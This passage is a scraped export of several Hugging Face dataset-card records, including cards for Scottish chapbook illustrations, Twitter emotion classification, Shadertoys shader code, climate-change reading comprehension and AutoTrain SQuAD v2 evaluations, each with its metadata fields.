"### Data Fields\n\n\nThe fields for the 'illustration-detection' config:\n\n\n* image\\_id: id for the image\n* height: height of the image\n* width: width of the image\n* image: image of the chapbook page\n* objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:\n\t+ bbox: bounding boxes for the images\n\t+ category\\_id: a label for the image\n\t+ image\\_id: id for the image\n\t+ iscrowd: COCO is a crowd flag\n\t+ segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)\n\n\nThe fields for the 'image-classification' config:\n\n\n* image: image\n* label: a label indicating if the page contains an illustration or not\n\n\nThe fields for the 'image-matching' config:\n\n\n* image: image of the chapbook page\n* label: an id for a particular instance of an image i.e. the same images will share the same id.",
"### Data Splits\n\n\nThere is a single split 'train' for all configs. K-fold validation was used in the paper describing this dataset, so no existing splits were defined.\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\nThe dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of VGG Image Search Engine (VISE) software, this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this public demo documented here",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe initial data was taken from the National Library of Scotland's Chapbooks Printed in Scotland dataset No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used.",
"#### Who are the source language producers?\n\n\nThe initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS Data Foundry under the direction of Dr. Sarah Ames.\n\n\nThis subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.",
"### Annotations",
"#### Annotation process\n\n\nAnnotation was initially performed on a subset of 337 of the 47329 images, using the VGG List Annotator (LISA software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see this paper for more details). Initial detections were performed with an EfficientDet object detector trained on COCO, the annotation of which is described in this paper",
"#### Who are the annotators?\n\n\nAbhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel.",
"### Personal and Sensitive Information\n\n\nNone\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\nWe believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.",
"### Discussion of Biases\n\n\nWhile the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.\n\n\nThe definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.\n\n\nAs there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.",
"### Other Known Limitations\n\n\nWithin this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\n* Giles Bergel\n* Abhishek Dutta",
"### Licensing Information\n\n\nIn accordance with the original data, this dataset is in the public domain.",
"### Contributions\n\n\nThanks to @davanstrien and Giles Bergel for adding this dataset."
] |
7b56660696f0df6adba35ef2d89e7bd549a2b409 |
一个包含六种基本情绪(愤怒、恐惧、喜悦、爱、悲伤和惊讶)的英文Twitter消息数据集
Github 链接 https://github.com/dair-ai/emotion_dataset
| ttxy/emotion | [
"task_categories:text-classification",
"language:code",
"license:bsd",
"classification",
"region:us"
] | 2022-07-24T05:00:03+00:00 | {"language": ["code"], "license": "bsd", "task_categories": ["text-classification"], "pretty_name": "English Emotion classification", "tags": ["classification"]} | 2023-08-17T01:25:59+00:00 | [] | [
"code"
] | TAGS
#task_categories-text-classification #language-code #license-bsd #classification #region-us
|
一个包含六种基本情绪(愤怒、恐惧、喜悦、爱、悲伤和惊讶)的英文Twitter消息数据集
Github 链接 URL
| [] | [
"TAGS\n#task_categories-text-classification #language-code #license-bsd #classification #region-us \n"
] |
0bafa7af1ec5ff70f682f40196ebc18708f8d27f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/minilm-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:20:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/minilm-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:23:49+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/minilm-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ghpkishore for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/minilm-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/minilm-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] |
0012c270d0bd91ea80c924aa6dfdf9358394daa2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-6l-768d
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-6l-768d", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:16+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-6l-768d
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ghpkishore for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-6l-768d\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinyroberta-6l-768d\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] |
446bb59eac4bc07d261513dd87c75cc14d00df1b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:57+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @ghpkishore for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @ghpkishore for evaluating this model."
] |
4eda02d5543e62650c00f8abd5b0cc1335b03088 | The Climate Change MRC dataset, also known as CCMRC, is a part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted at IJCAI-ECAI 2022. The paper was accepted in the special system demo track "AI for Good".
If you use the dataset, cite the following paper:
```
@inproceedings{rony2022climatemrc,
title={Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering.},
author={Rony, Md Rashad Al Hasan and Zuo, Ying and Kovriguina, Liubov and Teucher, Roman and Lehmann, Jens},
booktitle={IJCAI},
year={2022}
}
```
| rony/climate-change-MRC | [
"license:mit",
"region:us"
] | 2022-07-24T10:22:03+00:00 | {"license": "mit"} | 2022-07-25T05:14:09+00:00 | [] | [] | TAGS
#license-mit #region-us
| The Climate Change MRC dataset, also known as CCMRC, is a part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted at IJCAI-ECAI 2022. The paper was accepted in the special system demo track "AI for Good".
If you use the dataset, cite the following paper:
| [] | [
"TAGS\n#license-mit #region-us \n"
] |
796cb315ae0a504ac1b731a93216e019c2cd59a1 |
# Dataset Card for Shadertoys
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Source Data](#source-data)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Repository:** https://github.com/Vipitis/project (private placeholder)
### Dataset Summary
The Shadertoys dataset contains over 44k renderpasses collected from the Shadertoy.com API. Some shader programm contain multiple render passes.
To browse a subset of this dataset, look at the [ShaderEval](https://huggingface.co/spaces/Vipitis/ShaderCoder) space. A finer variant of this dataset is [Shadertoys-fine](https://huggingface.co/datasets/Vipitis/Shadertoys-fine).
### Supported Tasks and Leaderboards
`text-generation` the dataset can be used to train generative language models, for code completion tasks.
`ShaderEval` [task1](https://huggingface.co/spaces/Vipitis/ShaderEval) from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.
### Languages
- English (title, description, tags, comments)
- Shadercode **programming** language, a subset of GLSL specifically for Shadertoy.com
## Dataset Structure
### Data Instances
A data point consists of the whole shadercode, some information from the API as well as additional metadata.
```
{
'num_passes': 1,
'has_inputs': False,
'name': 'Image',
'type': 'image',
'code': '<full code>',
'title': '<title of the shader>',
'description': '<description of the shader>',
'tags': ['tag1','tag2','tag3', ... ],
'license': 'unknown',
'author': '<username>',
'source': 'https://shadertoy.com/view/<shaderID>'
}
```
### Data Fields
- 'num_passes' number of passes the parent shader program has
- 'has_inputs' if any inputs were used like textures, audio streams,
- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc
- 'type' type of the renderpass; one of `{'buffer', 'common', 'cubemap', 'image', 'sound'}`
- 'code' the raw code (including comments) the whole renderpass.
- 'title' Name of the Shader
- 'description' description given for the Shader
- 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags.
- 'license' currently in development
- 'author' username of the shader author
- 'source' URL to the shader. Not to the specific renderpass.
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2) and then iterated over the items in 'renderpass' while adding some of the fields from 'info'.
The code to generate these datasets should be published on the GitHub repository in the near future.
#### Who are the source language producers?
Shadertoy.com contributers which publish shaders as 'public+API'
## Licensing Information
The Default [license for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.
The Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizeable by naive means.
Please check the first comment of each shader program yourself as to not violate any copyrights for downstream use. The main license requires share alike and by attribution.
Attribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders. | Vipitis/Shadertoys | [
"task_categories:text-generation",
"task_categories:text-to-image",
"annotations_creators:no-annotation",
"language_creators:machine-generated",
"size_categories:10K<n<100K",
"language:en",
"language:code",
"license:cc-by-nc-sa-3.0",
"code",
"region:us"
] | 2022-07-24T14:08:41+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["machine-generated"], "language": ["en", "code"], "license": ["cc-by-nc-sa-3.0"], "multilinguality": [], "size_categories": ["10K<n<100K"], "source_datasets": [], "task_categories": ["text-generation", "text-to-image"], "task_ids": [], "pretty_name": "Shadertoys", "tags": ["code"], "dataset_info": {"features": [{"name": "num_passes", "dtype": "int64"}, {"name": "has_inputs", "dtype": "bool"}, {"name": "name", "dtype": "string"}, {"name": "type", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "title", "dtype": "string"}, {"name": "description", "dtype": "string"}, {"name": "tags", "sequence": "string"}, {"name": "author", "dtype": "string"}, {"name": "license", "dtype": "string"}, {"name": "source", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 162960894, "num_examples": 37841}, {"name": "test", "num_bytes": 26450429, "num_examples": 6617}], "download_size": 86294414, "dataset_size": 189411323}} | 2023-06-26T18:04:58+00:00 | [] | [
"en",
"code"
] | TAGS
#task_categories-text-generation #task_categories-text-to-image #annotations_creators-no-annotation #language_creators-machine-generated #size_categories-10K<n<100K #language-English #language-code #license-cc-by-nc-sa-3.0 #code #region-us
|
# Dataset Card for Shadertoys
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Source Data
- Licensing Information
## Dataset Description
- Repository: URL (private placeholder)
### Dataset Summary
The Shadertoys dataset contains over 44k renderpasses collected from the URL API. Some shader programm contain multiple render passes.
To browse a subset of this dataset, look at the ShaderEval space. A finer variant of this dataset is Shadertoys-fine.
### Supported Tasks and Leaderboards
'text-generation' the dataset can be used to train generative language models, for code completion tasks.
'ShaderEval' task1 from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.
### Languages
- English (title, description, tags, comments)
- Shadercode programming language, a subset of GLSL specifically for URL
## Dataset Structure
### Data Instances
A data point consists of the whole shadercode, some information from the API as well as additional metadata.
### Data Fields
- 'num_passes' number of passes the parent shader program has
- 'has_inputs' if any inputs were used like textures, audio streams,
- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc
- 'type' type of the renderpass; one of '{'buffer', 'common', 'cubemap', 'image', 'sound'}'
- 'code' the raw code (including comments) the whole renderpass.
- 'title' Name of the Shader
- 'description' description given for the Shader
- 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags.
- 'license' currently in development
- 'author' username of the shader author
- 'source' URL to the shader. Not to the specific renderpass.
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the URL API and then iterated over the items in 'renderpass' while adding some of the fields from 'info'.
The code to generate these datasets should be published on the GitHub repository in the near future.
#### Who are the source language producers?
URL contributers which publish shaders as 'public+API'
## Licensing Information
The Default license for each Shader is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.
The Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizeable by naive means.
Please check the first comment of each shader program yourself as to not violate any copyrights for downstream use. The main license requires share alike and by attribution.
Attribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders. | [
"# Dataset Card for Shadertoys",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Source Data\n- Licensing Information",
"## Dataset Description\n\n- Repository: URL (private placeholder)",
"### Dataset Summary\n\nThe Shadertoys dataset contains over 44k renderpasses collected from the URL API. Some shader programm contain multiple render passes.\nTo browse a subset of this dataset, look at the ShaderEval space. A finer variant of this dataset is Shadertoys-fine.",
"### Supported Tasks and Leaderboards\n\n 'text-generation' the dataset can be used to train generative language models, for code completion tasks.\n 'ShaderEval' task1 from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.",
"### Languages\n\n- English (title, description, tags, comments)\n- Shadercode programming language, a subset of GLSL specifically for URL",
"## Dataset Structure",
"### Data Instances\n\nA data point consists of the whole shadercode, some information from the API as well as additional metadata.",
"### Data Fields\n- 'num_passes' number of passes the parent shader program has\n- 'has_inputs' if any inputs were used like textures, audio streams,\n- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc\n- 'type' type of the renderpass; one of '{'buffer', 'common', 'cubemap', 'image', 'sound'}'\n- 'code' the raw code (including comments) the whole renderpass.\n- 'title' Name of the Shader\n- 'description' description given for the Shader\n- 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags.\n- 'license' currently in development\n- 'author' username of the shader author\n- 'source' URL to the shader. Not to the specific renderpass.",
"### Data Splits\n\nCurrently available (shuffled):\n - train (85.0%)\n - test (15.0%)",
"## Dataset Creation\n\nData retrieved starting 2022-07-20",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll data was collected via the URL API and then iterated over the items in 'renderpass' while adding some of the fields from 'info'.\nThe code to generate these datasets should be published on the GitHub repository in the near future.",
"#### Who are the source language producers?\n\nURL contributers which publish shaders as 'public+API'",
"## Licensing Information\n\nThe Default license for each Shader is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.\nThe Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizeable by naive means.\nPlease check the first comment of each shader program yourself as to not violate any copyrights for downstream use. The main license requires share alike and by attribution.\nAttribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders."
] | [
"TAGS\n#task_categories-text-generation #task_categories-text-to-image #annotations_creators-no-annotation #language_creators-machine-generated #size_categories-10K<n<100K #language-English #language-code #license-cc-by-nc-sa-3.0 #code #region-us \n",
"# Dataset Card for Shadertoys",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Source Data\n- Licensing Information",
"## Dataset Description\n\n- Repository: URL (private placeholder)",
"### Dataset Summary\n\nThe Shadertoys dataset contains over 44k renderpasses collected from the URL API. Some shader programm contain multiple render passes.\nTo browse a subset of this dataset, look at the ShaderEval space. A finer variant of this dataset is Shadertoys-fine.",
"### Supported Tasks and Leaderboards\n\n 'text-generation' the dataset can be used to train generative language models, for code completion tasks.\n 'ShaderEval' task1 from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.",
"### Languages\n\n- English (title, description, tags, comments)\n- Shadercode programming language, a subset of GLSL specifically for URL",
"## Dataset Structure",
"### Data Instances\n\nA data point consists of the whole shadercode, some information from the API as well as additional metadata.",
"### Data Fields\n- 'num_passes' number of passes the parent shader program has\n- 'has_inputs' if any inputs were used like textures, audio streams,\n- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc\n- 'type' type of the renderpass; one of '{'buffer', 'common', 'cubemap', 'image', 'sound'}'\n- 'code' the raw code (including comments) the whole renderpass.\n- 'title' Name of the Shader\n- 'description' description given for the Shader\n- 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags.\n- 'license' currently in development\n- 'author' username of the shader author\n- 'source' URL to the shader. Not to the specific renderpass.",
"### Data Splits\n\nCurrently available (shuffled):\n - train (85.0%)\n - test (15.0%)",
"## Dataset Creation\n\nData retrieved starting 2022-07-20",
"### Source Data",
"#### Initial Data Collection and Normalization\n\nAll data was collected via the URL API and then iterated over the items in 'renderpass' while adding some of the fields from 'info'.\nThe code to generate these datasets should be published on the GitHub repository in the near future.",
"#### Who are the source language producers?\n\nURL contributers which publish shaders as 'public+API'",
"## Licensing Information\n\nThe Default license for each Shader is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.\nThe Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizeable by naive means.\nPlease check the first comment of each shader program yourself as to not violate any copyrights for downstream use. The main license requires share alike and by attribution.\nAttribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders."
] |
3beff0e67d14889b60f313701a936360828e1283 |
This repository contains a slightly modified version of https://github.com/lang-uk/ukrainian-word-stress-dictionary to be used in Text-to-Speech project based on Tacoctron 2 | Yehor/uk-stresses | [
"uk",
"region:us"
] | 2022-07-24T19:54:28+00:00 | {"tags": ["uk"]} | 2022-07-28T12:57:39+00:00 | [] | [] | TAGS
#uk #region-us
|
This repository contains a slightly modified version of URL to be used in Text-to-Speech project based on Tacoctron 2 | [] | [
"TAGS\n#uk #region-us \n"
] |
47e32b8a853777f36903af82a1008f5d3f230d2a | -kowiki202206 1줄 말뭉치
| bongsoo/kowiki20220620 | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T03:45:16+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T23:08:42+00:00 | [] | [
"ko"
] | TAGS
#language-Korean #license-apache-2.0 #region-us
| -kowiki202206 1줄 말뭉치
| [] | [
"TAGS\n#language-Korean #license-apache-2.0 #region-us \n"
] |
79cedccdca57aee5a769b1898987f489c8aa3b8b | - 평가 말뭉치 | bongsoo/bongevalsmall | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T05:04:14+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T22:48:22+00:00 | [] | [
"ko"
] | TAGS
#language-Korean #license-apache-2.0 #region-us
| - 평가 말뭉치 | [] | [
"TAGS\n#language-Korean #license-apache-2.0 #region-us \n"
] |
8e5abafb2af8f768229735214b911e7aa9c7603b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-fdec2e9c-11705559 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:24:04+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-large-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:29:26+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
a6036b2dcc7768e2940fcab790fd0a42fa5a387d | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-8b8e12f7-11715560 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-25T06:28:43+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-large-squad2", "metrics": ["squad_v2"], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-25T06:33:16+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/roberta-large-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
